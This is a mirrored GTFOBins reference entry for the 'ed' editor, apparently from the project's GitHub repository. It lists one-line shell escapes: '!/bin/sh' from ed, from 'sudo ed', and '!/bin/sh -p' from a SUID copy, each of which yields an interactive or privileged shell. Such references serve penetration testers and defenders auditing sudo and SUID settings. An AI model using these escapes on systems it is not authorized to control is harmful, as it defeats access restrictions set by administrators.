mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-26 23:09:46 +01:00
15 lines
207 B
Markdown
15 lines
207 B
Markdown
|
---
|
||
|
functions:
|
||
|
exec-interactive:
|
||
|
- code: |
|
||
|
ed
|
||
|
!/bin/sh
|
||
|
sudo-enabled:
|
||
|
- code: |
|
||
|
sudo ed
|
||
|
!/bin/sh
|
||
|
suid-limited:
|
||
|
- code: |-
|
||
|
./ed
|
||
|
!/bin/sh -p
|
||
|
---
|